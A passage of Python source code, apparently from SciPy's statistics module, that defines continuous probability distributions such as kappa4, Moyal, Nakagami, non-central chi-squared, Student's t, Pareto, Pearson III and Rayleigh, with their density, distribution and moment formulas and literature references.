return (1.0/h)*sc.log1p(-h*(1.0 - k*x)**(1.0/k))
def f1(x, h, k):
'''cdf = np.exp(-(1.0 - k*x)**(1.0/k))
logcdf = ...
'''
return -(1.0 - k*x)**(1.0/k)
def f2(x, h, k):
'''cdf = (1.0 - h*np.exp(-x))**(1.0/h)
logcdf = ...
'''
return (1.0/h)*sc.log1p(-h*np.exp(-x))
def f3(x, h, k):
'''cdf = np.exp(-np.exp(-x))
logcdf = ...
'''
return -np.exp(-x)
return _lazyselect(condlist,
[f0, f1, f2, f3],
[x, h, k],
default=np.nan)
def _ppf(self, q, h, k):
condlist = [np.logical_and(h != 0, k != 0),
np.logical_and(h == 0, k != 0),
np.logical_and(h != 0, k == 0),
np.logical_and(h == 0, k == 0)]
def f0(q, h, k):
return 1.0/k*(1.0 - ((1.0 - (q**h))/h)**k)
def f1(q, h, k):
return 1.0/k*(1.0 - (-np.log(q))**k)
def f2(q, h, k):
'''ppf = -np.log((1.0 - (q**h))/h)
'''
return -sc.log1p(-(q**h)) + np.log(h)
def f3(q, h, k):
return -np.log(-np.log(q))
return _lazyselect(condlist,
[f0, f1, f2, f3],
[q, h, k],
default=np.nan)
def _stats(self, h, k):
if h >= 0 and k >= 0:
maxr = 5
elif h < 0 and k >= 0:
maxr = int(-1.0/h*k)
elif k < 0:
maxr = int(-1.0/k)
else:
maxr = 5
outputs = [None if r < maxr else np.nan for r in range(1, 5)]
return outputs[:]
kappa4 = kappa4_gen(name='kappa4')
class kappa3_gen(rv_continuous):
r"""Kappa 3 parameter distribution.
%(before_notes)s
Notes
-----
The probability density function for `kappa3` is:
.. math::
f(x, a) = a (a + x^a)^{-(a + 1)/a}
for :math:`x > 0` and :math:`a > 0`.
`kappa3` takes ``a`` as a shape parameter for :math:`a`.
References
----------
P.W. Mielke and E.S. Johnson, "Three-Parameter Kappa Distribution Maximum
Likelihood and Likelihood Ratio Tests", Methods in Weather Research,
701-707, (September, 1973),
https://doi.org/10.1175/1520-0493(1973)101<0701:TKDMLE>2.3.CO;2
B. Kumphon, "Maximum Entropy and Maximum Likelihood Estimation for the
Three-Parameter Kappa Distribution", Open Journal of Statistics, vol 2,
415-419 (2012), https://doi.org/10.4236/ojs.2012.24050
%(after_notes)s
%(example)s
"""
def _argcheck(self, a):
return a > 0
def _pdf(self, x, a):
# kappa3.pdf(x, a) = a*(a + x**a)**(-(a + 1)/a), for x > 0
return a*(a + x**a)**(-1.0/a-1)
def _cdf(self, x, a):
return x*(a + x**a)**(-1.0/a)
def _ppf(self, q, a):
return (a/(q**-a - 1.0))**(1.0/a)
def _stats(self, a):
outputs = [None if i < a else np.nan for i in range(1, 5)]
return outputs[:]
kappa3 = kappa3_gen(a=0.0, name='kappa3')
class moyal_gen(rv_continuous):
r"""A Moyal continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `moyal` is:
.. math::
f(x) = \exp(-(x + \exp(-x))/2) / \sqrt{2\pi}
for a real number :math:`x`.
%(after_notes)s
This distribution has utility in high-energy physics and radiation
detection. It describes the energy loss of a charged relativistic
particle due to ionization of the medium [1]_. It also provides an
approximation for the Landau distribution. For an in depth description
see [2]_. For additional description, see [3]_.
References
----------
.. [1] J.E. Moyal, "XXX. Theory of ionization fluctuations",
The London, Edinburgh, and Dublin Philosophical Magazine
and Journal of Science, vol 46, 263-280, (1955).
:doi:`10.1080/14786440308521076` (gated)
.. [2] G. Cordeiro et al., "The beta Moyal: a useful skew distribution",
International Journal of Research and Reviews in Applied Sciences,
vol 10, 171-192, (2012).
http://www.arpapress.com/Volumes/Vol10Issue2/IJRRAS_10_2_02.pdf
.. [3] C. Walck, "Handbook on Statistical Distributions for
Experimentalists; International Report SUF-PFY/96-01", Chapter 26,
University of Stockholm: Stockholm, Sweden, (2007).
http://www.stat.rice.edu/~dobelman/textfiles/DistributionsHandbook.pdf
.. versionadded:: 1.1.0
%(example)s
"""
def _rvs(self):
sz, rndm = self._size, self._random_state
u1 = gamma.rvs(a = 0.5, scale = 2, size=sz, random_state=rndm)
return -np.log(u1)
def _pdf(self, x):
return np.exp(-0.5 * (x + np.exp(-x))) / np.sqrt(2*np.pi)
def _cdf(self, x):
return sc.erfc(np.exp(-0.5 * x) / np.sqrt(2))
def _sf(self, x):
return sc.erf(np.exp(-0.5 * x) / np.sqrt(2))
def _ppf(self, x):
return -np.log(2 * sc.erfcinv(x)**2)
def _stats(self):
mu = np.log(2) + np.euler_gamma
mu2 = np.pi**2 / 2
g1 = 28 * np.sqrt(2) * sc.zeta(3) / np.pi**3
g2 = 4.
return mu, mu2, g1, g2
def _munp(self, n):
if n == 1.0:
return np.log(2) + np.euler_gamma
elif n == 2.0:
return np.pi**2 / 2 + (np.log(2) + np.euler_gamma)**2
elif n == 3.0:
tmp1 = 1.5 * np.pi**2 * (np.log(2)+np.euler_gamma)
tmp2 = (np.log(2)+np.euler_gamma)**3
tmp3 = 14 * sc.zeta(3)
return tmp1 + tmp2 + tmp3
elif n == 4.0:
tmp1 = 4 * 14 * sc.zeta(3) * (np.log(2) + np.euler_gamma)
tmp2 = 3 * np.pi**2 * (np.log(2) + np.euler_gamma)**2
tmp3 = (np.log(2) + np.euler_gamma)**4
tmp4 = 7 * np.pi**4 / 4
return tmp1 + tmp2 + tmp3 + tmp4
else:
# return generic for higher moments
# return rv_continuous._mom1_sc(self, n, b)
return self._mom1_sc(n)
moyal = moyal_gen(name="moyal")
class nakagami_gen(rv_continuous):
r"""A Nakagami continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `nakagami` is:
.. math::
f(x, \nu) = \frac{2 \nu^\nu}{\Gamma(\nu)} x^{2\nu-1} \exp(-\nu x^2)
for :math:`x >= 0`, :math:`\nu > 0`.
`nakagami` takes ``nu`` as a shape parameter for :math:`\nu`.
%(after_notes)s
%(example)s
"""
def _pdf(self, x, nu):
# nakagami.pdf(x, nu) = 2 * nu**nu / gamma(nu) *
# x**(2*nu-1) * exp(-nu*x**2)
return 2*nu**nu/sc.gamma(nu)*(x**(2*nu-1.0))*np.exp(-nu*x*x)
def _cdf(self, x, nu):
return sc.gammainc(nu, nu*x*x)
def _ppf(self, q, nu):
return np.sqrt(1.0/nu*sc.gammaincinv(nu, q))
def _stats(self, nu):
mu = sc.gamma(nu+0.5)/sc.gamma(nu)/np.sqrt(nu)
mu2 = 1.0-mu*mu
g1 = mu * (1 - 4*nu*mu2) / 2.0 / nu / np.power(mu2, 1.5)
g2 = -6*mu**4*nu + (8*nu-2)*mu**2-2*nu + 1
g2 /= nu*mu2**2.0
return mu, mu2, g1, g2
nakagami = nakagami_gen(a=0.0, name="nakagami")
class ncx2_gen(rv_continuous):
r"""A non-central chi-squared continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `ncx2` is:
.. math::
f(x, k, \lambda) = \frac{1}{2} \exp(-(\lambda+x)/2)
(x/\lambda)^{(k-2)/4} I_{(k-2)/2}(\sqrt{\lambda x})
for :math:`x >= 0` and :math:`k, \lambda > 0`. :math:`k` specifies the
degrees of freedom (denoted ``df`` in the implementation) and
:math:`\lambda` is the non-centrality parameter (denoted ``nc`` in the
implementation). :math:`I_\nu` denotes the modified Bessel function of
first order of degree :math:`\nu` (`scipy.special.iv`).
`ncx2` takes ``df`` and ``nc`` as shape parameters.
%(after_notes)s
%(example)s
"""
def _argcheck(self, df, nc):
return (df > 0) & (nc >= 0)
def _rvs(self, df, nc):
return self._random_state.noncentral_chisquare(df, nc, self._size)
def _logpdf(self, x, df, nc):
cond = np.ones_like(x, dtype=bool) & (nc != 0)
return _lazywhere(cond, (x, df, nc), f=_ncx2_log_pdf, f2=chi2.logpdf)
def _pdf(self, x, df, nc):
# ncx2.pdf(x, df, nc) = exp(-(nc+x)/2) * 1/2 * (x/nc)**((df-2)/4)
# * I[(df-2)/2](sqrt(nc*x))
cond = np.ones_like(x, dtype=bool) & (nc != 0)
return _lazywhere(cond, (x, df, nc), f=_ncx2_pdf, f2=chi2.pdf)
def _cdf(self, x, df, nc):
cond = np.ones_like(x, dtype=bool) & (nc != 0)
return _lazywhere(cond, (x, df, nc), f=_ncx2_cdf, f2=chi2.cdf)
def _ppf(self, q, df, nc):
cond = np.ones_like(q, dtype=bool) & (nc != 0)
return _lazywhere(cond, (q, df, nc), f=sc.chndtrix, f2=chi2.ppf)
def _stats(self, df, nc):
val = df + 2.0*nc
return (df + nc,
2*val,
np.sqrt(8)*(val+nc)/val**1.5,
12.0*(val+2*nc)/val**2.0)
ncx2 = ncx2_gen(a=0.0, name='ncx2')
class ncf_gen(rv_continuous):
r"""A non-central F distribution continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `ncf` is:
.. math::
f(x, n_1, n_2, \lambda) =
\exp(\frac{\lambda}{2} + \lambda n_1 \frac{x}{2(n_1 x+n_2)})
n_1^{n_1/2} n_2^{n_2/2} x^{n_1/2 - 1} \\
(n_2+n_1 x)^{-(n_1+n_2)/2}
\gamma(n_1/2) \gamma(1+n_2/2) \\
\frac{L^{\frac{v_1}{2}-1}_{v_2/2}
(-\lambda v_1 \frac{x}{2(v_1 x+v_2)})}
{B(v_1/2, v_2/2) \gamma(\frac{v_1+v_2}{2})}
for :math:`n_1 > 1`, :math:`n_2, \lambda > 0`. Here :math:`n_1` is the
degrees of freedom in the numerator, :math:`n_2` the degrees of freedom in
the denominator, :math:`\lambda` the non-centrality parameter,
:math:`\gamma` is the logarithm of the Gamma function, :math:`L_n^k` is a
generalized Laguerre polynomial and :math:`B` is the beta function.
`ncf` takes ``df1``, ``df2`` and ``nc`` as shape parameters.
%(after_notes)s
%(example)s
"""
def _rvs(self, dfn, dfd, nc):
return self._random_state.noncentral_f(dfn, dfd, nc, self._size)
def _pdf_skip(self, x, dfn, dfd, nc):
# ncf.pdf(x, df1, df2, nc) = exp(nc/2 + nc*df1*x/(2*(df1*x+df2))) *
# df1**(df1/2) * df2**(df2/2) * x**(df1/2-1) *
# (df2+df1*x)**(-(df1+df2)/2) *
# gamma(df1/2)*gamma(1+df2/2) *
# L^{v1/2-1}^{v2/2}(-nc*v1*x/(2*(v1*x+v2))) /
# (B(v1/2, v2/2) * gamma((v1+v2)/2))
n1, n2 = dfn, dfd
term = -nc/2+nc*n1*x/(2*(n2+n1*x)) + sc.gammaln(n1/2.)+sc.gammaln(1+n2/2.)
term -= sc.gammaln((n1+n2)/2.0)
Px = np.exp(term)
Px *= n1**(n1/2) * n2**(n2/2) * x**(n1/2-1)
Px *= (n2+n1*x)**(-(n1+n2)/2)
Px *= sc.assoc_laguerre(-nc*n1*x/(2.0*(n2+n1*x)), n2/2, n1/2-1)
Px /= sc.beta(n1/2, n2/2)
# This function does not have a return. Drop it for now, the generic
# function seems to work OK.
def _cdf(self, x, dfn, dfd, nc):
return sc.ncfdtr(dfn, dfd, nc, x)
def _ppf(self, q, dfn, dfd, nc):
return sc.ncfdtri(dfn, dfd, nc, q)
def _munp(self, n, dfn, dfd, nc):
val = (dfn * 1.0/dfd)**n
term = sc.gammaln(n+0.5*dfn) + sc.gammaln(0.5*dfd-n) - sc.gammaln(dfd*0.5)
val *= np.exp(-nc / 2.0+term)
val *= sc.hyp1f1(n+0.5*dfn, 0.5*dfn, 0.5*nc)
return val
def _stats(self, dfn, dfd, nc):
# Note: the rv_continuous class ensures that dfn > 0 when this function
# is called, so we don't have to check for division by zero with dfn
# in the following.
mu_num = dfd * (dfn + nc)
mu_den = dfn * (dfd - 2)
mu = np.full_like(mu_num, dtype=np.float64, fill_value=np.inf)
np.true_divide(mu_num, mu_den, where=dfd > 2, out=mu)
mu2_num = 2*((dfn + nc)**2 + (dfn + 2*nc)*(dfd - 2))*(dfd/dfn)**2
mu2_den = (dfd - 2)**2 * (dfd - 4)
mu2 = np.full_like(mu2_num, dtype=np.float64, fill_value=np.inf)
np.true_divide(mu2_num, mu2_den, where=dfd > 4, out=mu2)
return mu, mu2, None, None
ncf = ncf_gen(a=0.0, name='ncf')
class t_gen(rv_continuous):
r"""A Student's t continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `t` is:
.. math::
f(x, \nu) = \frac{\Gamma((\nu+1)/2)}
{\sqrt{\pi \nu} \Gamma(\nu/2)}
(1+x^2/\nu)^{-(\nu+1)/2}
where :math:`x` is a real number and the degrees of freedom parameter
:math:`\nu` (denoted ``df`` in the implementation) satisfies
:math:`\nu > 0`. :math:`\Gamma` is the gamma function
(`scipy.special.gamma`).
%(after_notes)s
%(example)s
"""
def _argcheck(self, df):
return df > 0
def _rvs(self, df):
return self._random_state.standard_t(df, size=self._size)
def _pdf(self, x, df):
# gamma((df+1)/2)
# t.pdf(x, df) = ---------------------------------------------------
# sqrt(pi*df) * gamma(df/2) * (1+x**2/df)**((df+1)/2)
r = np.asarray(df*1.0)
Px = np.exp(sc.gammaln((r+1)/2)-sc.gammaln(r/2))
Px /= np.sqrt(r*np.pi)*(1+(x**2)/r)**((r+1)/2)
return Px
def _logpdf(self, x, df):
r = df*1.0
lPx = sc.gammaln((r+1)/2)-sc.gammaln(r/2)
lPx -= 0.5*np.log(r*np.pi) + (r+1)/2*np.log(1+(x**2)/r)
return lPx
def _cdf(self, x, df):
return sc.stdtr(df, x)
def _sf(self, x, df):
return sc.stdtr(df, -x)
def _ppf(self, q, df):
return sc.stdtrit(df, q)
def _isf(self, q, df):
return -sc.stdtrit(df, q)
def _stats(self, df):
mu = np.where(df > 1, 0.0, np.inf)
mu2 = _lazywhere(df > 2, (df,),
lambda df: df / (df-2.0),
np.inf)
mu2 = np.where(df <= 1, np.nan, mu2)
g1 = np.where(df > 3, 0.0, np.nan)
g2 = _lazywhere(df > 4, (df,),
lambda df: 6.0 / (df-4.0),
np.inf)
g2 = np.where(df <= 2, np.nan, g2)
return mu, mu2, g1, g2
t = t_gen(name='t')
class nct_gen(rv_continuous):
r"""A non-central Student's t continuous random variable.
%(before_notes)s
Notes
-----
If :math:`Y` is a standard normal random variable and :math:`V` is
an independent chi-square random variable (`chi2`) with :math:`k` degrees
of freedom, then
.. math::
X = \frac{Y + c}{\sqrt{V/k}}
has a non-central Student's t distribution on the real line.
The degrees of freedom parameter :math:`k` (denoted ``df`` in the
implementation) satisfies :math:`k > 0` and the noncentrality parameter
:math:`c` (denoted ``nc`` in the implementation) is a real number.
%(after_notes)s
%(example)s
"""
def _argcheck(self, df, nc):
return (df > 0) & (nc == nc)
def _rvs(self, df, nc):
sz, rndm = self._size, self._random_state
n = norm.rvs(loc=nc, size=sz, random_state=rndm)
c2 = chi2.rvs(df, size=sz, random_state=rndm)
return n * np.sqrt(df) / np.sqrt(c2)
def _pdf(self, x, df, nc):
n = df*1.0
nc = nc*1.0
x2 = x*x
ncx2 = nc*nc*x2
fac1 = n + x2
trm1 = n/2.*np.log(n) + sc.gammaln(n+1)
trm1 -= n*np.log(2)+nc*nc/2.+(n/2.)*np.log(fac1)+sc.gammaln(n/2.)
Px = np.exp(trm1)
valF = ncx2 / (2*fac1)
trm1 = np.sqrt(2)*nc*x*sc.hyp1f1(n/2+1, 1.5, valF)
trm1 /= np.asarray(fac1*sc.gamma((n+1)/2))
trm2 = sc.hyp1f1((n+1)/2, 0.5, valF)
trm2 /= np.asarray(np.sqrt(fac1)*sc.gamma(n/2+1))
Px *= trm1+trm2
return Px
def _cdf(self, x, df, nc):
return sc.nctdtr(df, nc, x)
def _ppf(self, q, df, nc):
return sc.nctdtrit(df, nc, q)
def _stats(self, df, nc, moments='mv'):
#
# See D. Hogben, R.S. Pinkham, and M.B. Wilk,
# 'The moments of the non-central t-distribution'
# Biometrika 48, p. 465 (2961).
# e.g. https://www.jstor.org/stable/2332772 (gated)
#
mu, mu2, g1, g2 = None, None, None, None
gfac = sc.gamma(df/2.-0.5) / sc.gamma(df/2.)
c11 = np.sqrt(df/2.) * gfac
c20 = df / (df-2.)
c22 = c20 - c11*c11
mu = np.where(df > 1, nc*c11, np.inf)
mu2 = np.where(df > 2, c22*nc*nc + c20, np.inf)
if 's' in moments:
c33t = df * (7.-2.*df) / (df-2.) / (df-3.) + 2.*c11*c11
c31t = 3.*df / (df-2.) / (df-3.)
mu3 = (c33t*nc*nc + c31t) * c11*nc
g1 = np.where(df > 3, mu3 / np.power(mu2, 1.5), np.nan)
# kurtosis
if 'k' in moments:
c44 = df*df / (df-2.) / (df-4.)
c44 -= c11*c11 * 2.*df*(5.-df) / (df-2.) / (df-3.)
c44 -= 3.*c11**4
c42 = df / (df-4.) - c11*c11 * (df-1.) / (df-3.)
c42 *= 6.*df / (df-2.)
c40 = 3.*df*df / (df-2.) / (df-4.)
mu4 = c44 * nc**4 + c42*nc**2 + c40
g2 = np.where(df > 4, mu4/mu2**2 - 3., np.nan)
return mu, mu2, g1, g2
nct = nct_gen(name="nct")
class pareto_gen(rv_continuous):
r"""A Pareto continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `pareto` is:
.. math::
f(x, b) = \frac{b}{x^{b+1}}
for :math:`x \ge 1`, :math:`b > 0`.
`pareto` takes ``b`` as a shape parameter for :math:`b`.
%(after_notes)s
%(example)s
"""
def _pdf(self, x, b):
# pareto.pdf(x, b) = b / x**(b+1)
return b * x**(-b-1)
def _cdf(self, x, b):
return 1 - x**(-b)
def _ppf(self, q, b):
return pow(1-q, -1.0/b)
def _sf(self, x, b):
return x**(-b)
def _stats(self, b, moments='mv'):
mu, mu2, g1, g2 = None, None, None, None
if 'm' in moments:
mask = b > 1
bt = np.extract(mask, b)
mu = valarray(np.shape(b), value=np.inf)
np.place(mu, mask, bt / (bt-1.0))
if 'v' in moments:
mask = b > 2
bt = np.extract(mask, b)
mu2 = valarray(np.shape(b), value=np.inf)
np.place(mu2, mask, bt / (bt-2.0) / (bt-1.0)**2)
if 's' in moments:
mask = b > 3
bt = np.extract(mask, b)
g1 = valarray(np.shape(b), value=np.nan)
vals = 2 * (bt + 1.0) * np.sqrt(bt - 2.0) / ((bt - 3.0) * np.sqrt(bt))
np.place(g1, mask, vals)
if 'k' in moments:
mask = b > 4
bt = np.extract(mask, b)
g2 = valarray(np.shape(b), value=np.nan)
vals = (6.0*np.polyval([1.0, 1.0, -6, -2], bt) /
np.polyval([1.0, -7.0, 12.0, 0.0], bt))
np.place(g2, mask, vals)
return mu, mu2, g1, g2
def _entropy(self, c):
return 1 + 1.0/c - np.log(c)
pareto = pareto_gen(a=1.0, name="pareto")
class lomax_gen(rv_continuous):
r"""A Lomax (Pareto of the second kind) continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `lomax` is:
.. math::
f(x, c) = \frac{c}{(1+x)^{c+1}}
for :math:`x \ge 0`, :math:`c > 0`.
`lomax` takes ``c`` as a shape parameter for :math:`c`.
`lomax` is a special case of `pareto` with ``loc=-1.0``.
%(after_notes)s
%(example)s
"""
def _pdf(self, x, c):
# lomax.pdf(x, c) = c / (1+x)**(c+1)
return c*1.0/(1.0+x)**(c+1.0)
def _logpdf(self, x, c):
return np.log(c) - (c+1)*sc.log1p(x)
def _cdf(self, x, c):
return -sc.expm1(-c*sc.log1p(x))
def _sf(self, x, c):
return np.exp(-c*sc.log1p(x))
def _logsf(self, x, c):
return -c*sc.log1p(x)
def _ppf(self, q, c):
return sc.expm1(-sc.log1p(-q)/c)
def _stats(self, c):
mu, mu2, g1, g2 = pareto.stats(c, loc=-1.0, moments='mvsk')
return mu, mu2, g1, g2
def _entropy(self, c):
return 1+1.0/c-np.log(c)
lomax = lomax_gen(a=0.0, name="lomax")
class pearson3_gen(rv_continuous):
r"""A pearson type III continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `pearson3` is:
.. math::
f(x, skew) = \frac{|\beta|}{\Gamma(\alpha)}
(\beta (x - \zeta))^{\alpha - 1}
\exp(-\beta (x - \zeta))
where:
.. math::
\beta = \frac{2}{skew stddev}
\alpha = (stddev \beta)^2
\zeta = loc - \frac{\alpha}{\beta}
:math:`\Gamma` is the gamma function (`scipy.special.gamma`).
`pearson3` takes ``skew`` as a shape parameter for :math:`skew`.
%(after_notes)s
%(example)s
References
----------
R.W. Vogel and D.E. McMartin, "Probability Plot Goodness-of-Fit and
Skewness Estimation Procedures for the Pearson Type 3 Distribution", Water
Resources Research, Vol.27, 3149-3158 (1991).
L.R. Salvosa, "Tables of Pearson's Type III Function", Ann. Math. Statist.,
Vol.1, 191-198 (1930).
"Using Modern Computing Tools to Fit the Pearson Type III Distribution to
Aviation Loads Data", Office of Aviation Research (2003).
"""
def _preprocess(self, x, skew):
# The real 'loc' and 'scale' are handled in the calling pdf(...). The
# local variables 'loc' and 'scale' within pearson3._pdf are set to
# the defaults just to keep them as part of the equations for
# documentation.
loc = 0.0
scale = 1.0
# If skew is small, return _norm_pdf. The divide between pearson3
# and norm was found by brute force and is approximately a skew of
# 0.000016. No one, I hope, would actually use a skew value even
# close to this small.
norm2pearson_transition = 0.000016
ans, x, skew = np.broadcast_arrays([1.0], x, skew)
ans = ans.copy()
# mask is True where skew is small enough to use the normal approx.
mask = np.absolute(skew) < norm2pearson_transition
invmask = ~mask
beta = 2.0 / (skew[invmask] * scale)
alpha = (scale * beta)**2
zeta = loc - alpha / beta
transx = beta * (x[invmask] - zeta)
return ans, x, transx, mask, invmask, beta, alpha, zeta
def _argcheck(self, skew):
# The _argcheck function in rv_continuous only allows positive
# arguments. The skew argument for pearson3 can be zero (which I want
# to handle inside pearson3._pdf) or negative. So just return True
# for all skew args.
return np.ones(np.shape(skew), dtype=bool)
def _stats(self, skew):
_, _, _, _, _, beta, alpha, zeta = (
self._preprocess([1], skew))
m = zeta + alpha / beta
v = alpha / (beta**2)
s = 2.0 / (alpha**0.5) * np.sign(beta)
k = 6.0 / alpha
return m, v, s, k
def _pdf(self, x, skew):
# pearson3.pdf(x, skew) = abs(beta) / gamma(alpha) *
# (beta * (x - zeta))**(alpha - 1) * exp(-beta*(x - zeta))
# Do the calculation in _logpdf since helps to limit
# overflow/underflow problems
ans = np.exp(self._logpdf(x, skew))
if ans.ndim == 0:
if np.isnan(ans):
return 0.0
return ans
ans[np.isnan(ans)] = 0.0
return ans
def _logpdf(self, x, skew):
# PEARSON3 logpdf GAMMA logpdf
# np.log(abs(beta))
# + (alpha - 1)*np.log(beta*(x - zeta)) + (a - 1)*np.log(x)
# - beta*(x - zeta) - x
# - sc.gammalnalpha) - sc.gammalna)
ans, x, transx, mask, invmask, beta, alpha, _ = (
self._preprocess(x, skew))
ans[mask] = np.log(_norm_pdf(x[mask]))
ans[invmask] = np.log(abs(beta)) + gamma._logpdf(transx, alpha)
return ans
def _cdf(self, x, skew):
ans, x, transx, mask, invmask, _, alpha, _ = (
self._preprocess(x, skew))
ans[mask] = _norm_cdf(x[mask])
ans[invmask] = gamma._cdf(transx, alpha)
return ans
def _rvs(self, skew):
skew = broadcast_to(skew, self._size)
ans, _, _, mask, invmask, beta, alpha, zeta = (
self._preprocess([0], skew))
nsmall = mask.sum()
nbig = mask.size - nsmall
ans[mask] = self._random_state.standard_normal(nsmall)
ans[invmask] = (self._random_state.standard_gamma(alpha, nbig)/beta +
zeta)
if self._size == ():
ans = ans[0]
return ans
def _ppf(self, q, skew):
ans, q, _, mask, invmask, beta, alpha, zeta = (
self._preprocess(q, skew))
ans[mask] = _norm_ppf(q[mask])
ans[invmask] = sc.gammaincinv(alpha, q[invmask])/beta + zeta
return ans
pearson3 = pearson3_gen(name="pearson3")
class powerlaw_gen(rv_continuous):
r"""A power-function continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `powerlaw` is:
.. math::
f(x, a) = a x^{a-1}
for :math:`0 \le x \le 1`, :math:`a > 0`.
`powerlaw` takes ``a`` as a shape parameter for :math:`a`.
%(after_notes)s
`powerlaw` is a special case of `beta` with ``b=1``.
%(example)s
"""
def _pdf(self, x, a):
# powerlaw.pdf(x, a) = a * x**(a-1)
return a*x**(a-1.0)
def _logpdf(self, x, a):
return np.log(a) + sc.xlogy(a - 1, x)
def _cdf(self, x, a):
return x**(a*1.0)
def _logcdf(self, x, a):
return a*np.log(x)
def _ppf(self, q, a):
return pow(q, 1.0/a)
def _stats(self, a):
return (a / (a + 1.0),
a / (a + 2.0) / (a + 1.0) ** 2,
-2.0 * ((a - 1.0) / (a + 3.0)) * np.sqrt((a + 2.0) / a),
6 * np.polyval([1, -1, -6, 2], a) / (a * (a + 3.0) * (a + 4)))
def _entropy(self, a):
return 1 - 1.0/a - np.log(a)
powerlaw = powerlaw_gen(a=0.0, b=1.0, name="powerlaw")
class powerlognorm_gen(rv_continuous):
r"""A power log-normal continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `powerlognorm` is:
.. math::
f(x, c, s) = \frac{c}{x s} \phi(\log(x)/s)
(\Phi(-\log(x)/s))^{c-1}
where :math:`\phi` is the normal pdf, and :math:`\Phi` is the normal cdf,
and :math:`x > 0`, :math:`s, c > 0`.
`powerlognorm` takes :math:`c` and :math:`s` as shape parameters.
%(after_notes)s
%(example)s
"""
_support_mask = rv_continuous._open_support_mask
def _pdf(self, x, c, s):
# powerlognorm.pdf(x, c, s) = c / (x*s) * phi(log(x)/s) *
# (Phi(-log(x)/s))**(c-1),
return (c/(x*s) * _norm_pdf(np.log(x)/s) *
pow(_norm_cdf(-np.log(x)/s), c*1.0-1.0))
def _cdf(self, x, c, s):
return 1.0 - pow(_norm_cdf(-np.log(x)/s), c*1.0)
def _ppf(self, q, c, s):
return np.exp(-s * _norm_ppf(pow(1.0 - q, 1.0 / c)))
powerlognorm = powerlognorm_gen(a=0.0, name="powerlognorm")
class powernorm_gen(rv_continuous):
r"""A power normal continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `powernorm` is:
.. math::
f(x, c) = c \phi(x) (\Phi(-x))^{c-1}
where :math:`\phi` is the normal pdf, and :math:`\Phi` is the normal cdf,
and :math:`x >= 0`, :math:`c > 0`.
`powernorm` takes ``c`` as a shape parameter for :math:`c`.
%(after_notes)s
%(example)s
"""
def _pdf(self, x, c):
# powernorm.pdf(x, c) = c * phi(x) * (Phi(-x))**(c-1)
return c*_norm_pdf(x) * (_norm_cdf(-x)**(c-1.0))
def _logpdf(self, x, c):
return np.log(c) + _norm_logpdf(x) + (c-1)*_norm_logcdf(-x)
def _cdf(self, x, c):
return 1.0-_norm_cdf(-x)**(c*1.0)
def _ppf(self, q, c):
return -_norm_ppf(pow(1.0 - q, 1.0 / c))
powernorm = powernorm_gen(name='powernorm')
class rdist_gen(rv_continuous):
r"""An R-distributed continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `rdist` is:
.. math::
f(x, c) = \frac{(1-x^2)^{c/2-1}}{B(1/2, c/2)}
for :math:`-1 \le x \le 1`, :math:`c > 0`.
`rdist` takes ``c`` as a shape parameter for :math:`c`.
This distribution includes the following distribution kernels as
special cases::
c = 2: uniform
c = 4: Epanechnikov (parabolic)
c = 6: quartic (biweight)
c = 8: triweight
%(after_notes)s
%(example)s
"""
def _pdf(self, x, c):
# rdist.pdf(x, c) = (1-x**2)**(c/2-1) / B(1/2, c/2)
return np.power((1.0 - x**2), c / 2.0 - 1) / sc.beta(0.5, c / 2.0)
def _cdf(self, x, c):
term1 = x / sc.beta(0.5, c / 2.0)
res = 0.5 + term1 * sc.hyp2f1(0.5, 1 - c / 2.0, 1.5, x**2)
# There's an issue with hyp2f1, it returns nans near x = +-1, c > 100.
# Use the generic implementation in that case. See gh-1285 for
# background.
if np.any(np.isnan(res)):
return rv_continuous._cdf(self, x, c)
return res
def _munp(self, n, c):
numerator = (1 - (n % 2)) * sc.beta((n + 1.0) / 2, c / 2.0)
return numerator / sc.beta(1. / 2, c / 2.)
rdist = rdist_gen(a=-1.0, b=1.0, name="rdist")
class rayleigh_gen(rv_continuous):
r"""A Rayleigh continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `rayleigh` is:
.. math::
f(x) = x \exp(-x^2/2)
for :math:`x \ge 0`.
`rayleigh` is a special case of `chi` with ``df=2``.
%(after_notes)s
%(example)s
"""
_support_mask = rv_continuous._open_support_mask
def _rvs(self):
return chi.rvs(2, size=self._size, random_state=self._random_state)
def _pdf(self, r):
# rayleigh.pdf(r) = r * exp(-r**2/2)
return np.exp(self._logpdf(r))
def _logpdf(self, r):
return np.log(r) - 0.5 * r * r
def _cdf(self, r):
return -sc.expm1(-0.5 * r**2)
def _ppf(self, q):
return np.sqrt(-2 * sc.log1p(-q))
def _sf(self, r):
return np.exp(self._logsf(r))
def _logsf(self, r):
return -0.5 * r * r
def _isf(self, q):
return np.sqrt(-2 * np.log(q))
def _stats(self):
val = 4 - np.pi
return (np.sqrt(np.pi/2),
val/2,
2*(np.pi-3)*np.sqrt(np.pi)/val**1.5,
6*np.pi/val-16/val**2)
def _entropy(self):
return _EULER/2.0 + 1 - 0.5*np.log(2)
rayleigh = rayleigh_gen(a=0.0, name="rayleigh")
class reciprocal_gen(rv_continuous):
r"""A reciprocal continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `reciprocal` is:
.. math::
f(x, a, b) = \frac{1}{x \log(b/a)}
for :math:`a \le x \le b`, :math:`b > a > 0`.
`reciprocal` takes :math:`a` and :math:`b` as shape parameters.
%(after_notes)s
%(example)s
"""
def _argcheck(self, a, b):
return (a > 0) & (b > a)
def _get_support(self, a, b):
return a, b
def _pdf(self, x, a, b):
# reciprocal.pdf(x, a, b) = 1 / (x*log(b/a))
return 1.0 / (x * np.log(b * 1.0 / a))
def _logpdf(self, x, a, b):
return -np.log(x) - np.log(np.log(b * 1.0 / a))
def _cdf(self, x, a, b):
return (np.log(x)-np.log(a)) / np.log(b * 1.0 / a)
def _ppf(self, q, a, b):
return a*pow(b*1.0/a, q)
def _munp(self, n, a, b):
return 1.0/np.log(b*1.0/a) / n * (pow(b*1.0, n) - pow(a*1.0, n))
def _entropy(self, a, b):
